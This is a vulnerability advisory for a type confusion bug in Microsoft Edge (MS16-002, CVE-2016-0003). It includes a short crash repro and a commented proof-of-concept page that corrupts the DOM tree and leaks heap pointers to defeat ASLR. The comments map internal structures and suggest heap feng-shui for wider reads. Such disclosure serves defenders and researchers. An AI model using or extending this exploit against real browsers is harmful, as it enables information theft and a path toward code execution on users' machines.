This is a friendly warning that your web-browser does not currently protecting your privacy and/or security as well as you might want. Click on this message to see more information about the issue(s) that were detected.

March 10th, 2016 MS Edge CDOMTextNode::get_data type confusion

MS Edge CDOMTextNode::get_data type confusion

(MS16-002, CVE-2016-0003)

Specially crafted Javascript inside an HTML page can trigger a type confusion bug in Microsoft Edge that allows accessing a C++ object as if it was a BSTR string. This can result in information disclosure, such as allowing an attacker to determine the value of pointers to other objects and/or functions. This information can be used to bypass ASLR mitigations. It may also be possible to modify arbitrary memory and achieve remote code execution, but this was not investigated.

Known affected software, attack vectors and mitigation

Microsoft Edge 20.10240.16384.0

An attacker would need to get a target user to open a specially crafted web-page. JavaScript appears to be required to trigger the issue.

Repro.html <html> <head> <script> document.addEventListener("DOMNodeRemoved", function(oEvent) { oTextNode = document.createTextNode(""); document.body.insertBefore(oTextNode); }, true); onload = function(){ document.body.appendChild(oExistingChild); for (var oNode = document.body.firstChild; oNode && oNode != oNode.nextSibling; // note #1 below oNode = oNode.nextSibling ) { // Doing this seems to be required to avoid triggering an assert. // The tree is corrupt in that oTextNode.nextSibling == oTextNode // hence the extra check at #1 to prevent an infinite loop. } alert(oTextNode.nodeValue); } </script> </head> <body id=oParent>x<x id=oExistingChild>x</x></body> </html>

Description

Appending one element to its parent in the DOM tree will cause MSIE to first remove the element from its parent, which triggers a DOMNodeRemoved event, and then re-append the element as the last child of its original parent. During the DOMNodeRemoved event, a Javascript event handler function can modify the DOM tree, e.g. by appending a text node to the parent element. This operation is completed during the event and thus this text node is appended as a child before the element that fired the event is. Once the event handler returns, the element is appended. It appears that the code determines the location where this element should be appended before firing the DOMNodeRemoved event handler, and the element is thus inserted as a child of the parent before the text node, rather than after it.

After all this is done, the DOM tree has become corrupted. This can be confirmed by checking that the .nextSibling property of the text node is the text node itself, i.e. there is a loop in the DOM tree.

Another effect is that reading the .nodeValue of the text node will cause the code to confuse a C++ object that Trident/Edge uses to model the DOM tree with a BSTR object that represents the text data stored in the text node. This allows an attacker to read the data stored in this C++ object, which includes various pointers.

Exploit

A PoC exploit that reads and shows partial content of the DOM tree object was created; it has been tested on x64 systems to show heap pointers, allowing an attacker to undo heap ASLR.

The amount of data read can be controlled by the attacker and data beyond the memory allocated for the C++ object can be read. An attacker may be able to use Heap Feng-Shui to position another object with interesting information in the memory following the C++ DOM tree object and read data from this second object as well.

Finally, setting the nodeValue property is possible and caused an access violation when I attempted it. I did not analyze the code path or the reason for the AV; but it is speculated that it may be possible to modify the C++ DOM tree object and/or other memory using this bug. This is of course an even more interesting aspect for an attacker, as it may allow remote code execution.

No attempt to create a PoC exploit that abuses this issue to undo ASLR and/or execute arbitrary code was made.

Exploit.html <html> <head> <script> var uNodeRemovedEvents = 0; onerror = function (sError, sSource, uLine){ alert(sError + " on line " + uLine); }; document.addEventListener("DOMNodeRemoved", function(oEvent) { if (uNodeRemovedEvents++ == 0) { oTextNode = document.createTextNode("[2]"); // Note that insertBefore with no second argument is functionally equivalent to appendChild and Edge's // implementation will simply call the appendChild implementation. I have used insertBefore here to make it // easier to identify if a heap block was allocated by this call, or the appendChild call you'll see later: // the stack recorded by page heap does not include "appendChild" here but it does for the later. document.body.insertBefore(oTextNode); }; }, true); onload = function(){ // appendChild on an element that has a parent will remove it from the parent first, trigger a DOMNodeRemoved // event, then append it as the last child of the new parent and trigger a DOMNodeInserted event. document.body.appendChild(oExistingChild); // However, during the DOMNodeRemoved event for oExistingChild, the oTextNode node is inserted using // appendChild. This second appendChild call is completed first, so the oTextNode node is appended as the last // child of the body element first. The DOMNodeRemoved event completes and the oExistingChild node is then // appended as the second to last child of the body element. For reasons unknown, after this the nextSibling of // oTextNode is corrupted and points to itself, creating a sort of loop in the DOM tree. for (var oNode = document.body.firstChild; oNode && oNode != oNode.nextSibling; oNode = oNode.nextSibling) { // Doing this seems to be required to avoid triggering an assert - not sure why, but it might cache the // tree in a way that prevents Edge from detecting that the tree is corrupt. } if (oTextNode.nextSibling !== oTextNode) { // This should have happened, but if the bug was triggered, the tree is corrupt and oTextNode is its own // sibling. throw new Error("Tree is not corrupt"); } alert("Set breakpoints if needed"); // ^^ You can set a breakpoint during this popup to follow what happens, some suggested locations: // * EDGEHTML!CDOMTextNode::get_data // * EDGEHTML!CDOMTextNode::get_length // * EDGEHTML!Tree::TextNode::TextNodeFromDOMTextNode // * msvcrt!memcpy_s // After hitting the breakpoint, you may want to step over code until you return from the call to // TextNodeFromDOMTextNode. Its return value is a pointer to a structure like this: // struct first_structure { // DWORD dwUnknown_00; // flags, value depends on DOM tree at start of repro. // DWORD dwUnknown_04; // VOID* pUnknown_08; // VOID* pUnknown_10; // VOID* pUnknown_18; // VOID* pUnknown_20; // BYTE[0x10] bUnknown_28; // VOID* pUnknown_38; // points to self or another structure, depends on DOM tree at start of repro. // VOID* pUnknown_40; // VOID* pUnknown_48; // VOID* pElement_50; // points to an C*Element instance // VOID* pUnknown_58; // BYTE[0x18] bUnknown_60; // VOID* pUnknown_78; // VOID* pUnknown_80; // BYTE[0x10] bUnknown_88; // VOID* pUnknown_98; // VOID* pUnknown_A0; // BYTE[0x8] bUnknown_A8; // } // The second_structure and third_structure mentioned above look like this: // struct second_structure { // DWORD dwUnknown_00; // flags, value depends on DOM tree at start of repro. // DWORD dwUnknown_04; // VOID* pUnknown_08; // VOID* pUnknown_10; // VOID* pUnknown_18; // VOID* pUnknown_20; // BYTE[0x8] bUnknown_28; // VOID* pUnknown_30; // VOID* pUnknown_38; // BYTE[0x10] bUnknown_40; // } // struct third_structure { // DWORD dwUnknown_00; // flags, value depends on DOM tree at start of repro. // DWORD dwUnknown_04; // VOID* pUnknown_08; // VOID* pUnknown_10; // VOID* pUnknown_18; // VOID* pUnknown_20; // VOID* pElement_28; // points to an C*Element instance // VOID* pUnknown_30; // BYTE[0x18] bUnknown_38; // VOID* pUnknown_50; // VOID* pUnknown_58; // BYTE[0x10] bUnknown_60; // VOID* pUnknown_70; // VOID* pUnknown_78; // BYTE[0x8] bUnknown_80; // } // These structures are typical structures used by Trident to keep track of the DOM tree. However, the code // appears to confuse them with structures of a type that contain the text data in a TextNode. The code assumes // that the length of the (BSTR) text data is found at "first_structure->pUnknown_38->dwUnknown_00", and the // BSTR itself at "first_structure + 0xC". These two values can be influence through the initial HTML, like so: // copying bytes from first_structure+0xC // | first_structure | *pUnknown_38 | // Initial HTML: | dwUnknown_00 | typeof *pUnknown_38 | dwUnknown_00 | //-----------------------------------------+--------------+---------------------+--------------+ // x<x id=oExistingChild></x> | 0x21 | (self) | 0x21 | // x<x id=oExistingChild>x</x> | 0x31 | second_structure | 0xa4 | // x<x id=oExistingChild>x<a></a></x> | 0x31 | third_structure | 0x422 | // <a>x<x id=oExistingChild></x></a> | 0x421 | (self) | 0x421 | // So, "x<x id=oExistingChild></x>" is a "safe" value to use, as it will copy 0x21 WCHARs from // first_structure+0xC // into a new BSTR; effectively copying bytes 0x0C-0x4E, which is well within the range of the structure. This // allows an attacker to read parts of the first_structure data, including a number of pointers to heap data. // // If one would like to read information not stored in the first_structure, some of the other HTML strings may // be used to copy more information than is contained in just the first_structure: e.g. // "x<x id=oExistingChild>x</x>" copies 0xa4 WCHARs, which means bytes 0x0C-0x154, which is well beyond the // extend of the first_structure data. With page heap enabled, you will see an access violation. Without page // heap and with a bit of heap feng-shui, an attacker may be able to position an object with other interesting // information in the memory following the first_structure, e.g. an object with a vftable pointer. This would // allow an attacker to read the vftable pointer and determine the location of DLLs in memory. // // To keep this repro simple and reliable, it only attempts to read data from within first_structure. var sData = ("A" + oTextNode.nodeValue).substr(1); // make a copy var sHexData = "Read 0x" + sData.length.toString(16); sHexData += " bytes: ????????`????????"; // first three DWORDs are unknown sHexQWord = "`????????"; // third DWORD is unknown for (var uBytes = 4, uOffset = 4, uIndex = 0; uIndex < sData.length; uIndex++) { var sHexWord = sData.charCodeAt(uIndex).toString(16); while (sHexWord.length < 4) sHexWord = "0" + sHexWord; sHexQWord = sHexWord + sHexQWord; uBytes += 2; if (uBytes == 4) sHexQWord = "`" + sHexQWord; if (uBytes == 8) { sHexData += " " + sHexQWord; sHexQWord = ""; uBytes = 0; }; }; if (sHexQWord) { while (sHexQWord.length < 17) { if (sHexQWord.length == 8) sHexQWord += "`"; sHexQWord = "????" + sHexQWord; } sHexData += " " + sHexQWord; } alert(sHexData); // This will crash because of the corrupt DOM tree, but it appears to indicate you may be able to modify // data as well as read it. oTextNode.nodeValue = ""; }; </script> </head> <body>x<x id=oExistingChild></x></body> </html>

MS Edge CDOMText­Node::get_­data type confusion

Known affected software, attack vectors and mitigation

Description

Exploit

MS Edge CDOMTextNode::get_data type confusion